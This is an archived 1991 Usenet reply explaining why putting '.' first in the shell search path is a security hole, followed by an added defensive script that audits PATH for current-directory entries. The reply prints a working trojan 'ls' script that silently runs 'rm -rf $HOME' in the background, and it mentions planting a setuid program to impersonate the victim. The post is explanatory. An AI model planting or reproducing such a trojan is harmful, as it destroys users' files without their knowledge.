Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!wuarchive!sdd.hp.com!spool.mu.edu!snorkelwacker.mit.edu!bloom-picayune.mit.edu!athena.mit.edu!jik
From: jik@athena.mit.edu (Jonathan I. Kamens)
Newsgroups: comp.unix.questions
Subject: dot in path
Message-ID: <1991Feb22.040932.29714@athena.mit.edu>
Date: 22 Feb 91 04:09:32 GMT
References: <1991Feb22.004010.13359@zip.eecs.umich.edu>
Sender: news@athena.mit.edu (News system)
Organization: Massachusetts Institute of Technology
Lines: 33

In article <1991Feb22.004010.13359@zip.eecs.umich.edu>, bguthy@amazon.eecs.umich.edu (Bala S. Guthy) writes:
|> Hello, I remember when I first learnt Unix, the instructor said,
|> that "." should never be the first thing in one's $path. It had
|> something to do with a security hole in Unix. Does anyone know
|> what and if there is any disadvantage to having "." as the first
|> entry in $path.

  Because if you cd into a directory in which someone else has placed a trojan
horse named the same as a common system utility, and then run that utility,
then you're actually running the trojan horse.

  Example: I create a shell script in my home directory called "ls" which does
this:

    #!/bin/sh
    nice /bin/sh -c "rm -rf $HOME &"
    exec /bin/ls $*

  You cd into my home directory out of curiosity and type "ls".  You're scrod.
You might not even notice that your files are disappearing.

  Alternatively, I could make my trojan horse create a program that is setuid
to you that I can run at my leisure to become you.

  You get the idea, I hope.

-- 
Jonathan Kamens                       USnail:
MIT Project Athena                    11 Ashford Terrace
jik@Athena.MIT.EDU                    Allston, MA 02134
Office: 617-253-8085                  Home: 617-782-0710
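
A check for the condition discussed in this thread, added here as an example and not part of the original post: it reports every search-path entry that resolves against the current directory. It goes beyond a literal "." to cover empty entries (a leading, trailing or doubled colon) and other relative entries, which the shell treats the same way; the function name audit_path is hypothetical.

```shell
#!/bin/sh
# Added example (not from the original post). audit_path is a hypothetical name.
# Prints "<position>:<kind>:<entry>" for every PATH entry that the shell
# resolves against the current directory:
#   dot      - "." or "./"
#   empty    - leading, trailing or doubled colon
#   relative - any other entry that does not start with "/"
audit_path() {
    position=0
    # Append a colon so that a trailing empty entry survives the split.
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first colon
        rest=${rest#*:}     # text after the first colon
        position=$((position + 1))
        case $entry in
            '')    printf '%s\n' "$position:empty:" ;;
            .|./)  printf '%s\n' "$position:dot:$entry" ;;
            /*)    ;;  # absolute directory: not affected by cd
            *)     printf '%s\n' "$position:relative:$entry" ;;
        esac
    done
    return 0
}

# Constructed sample: "." first, an empty entry in the middle, "bin" last.
audit_path '.:/usr/bin::/bin:bin'
# Audit the live search path of the current shell.
audit_path "$PATH"
```

The reported position matters because the shell searches entries in order: a flagged entry ahead of /bin can shadow ls itself, while one at the end only catches names not found earlier.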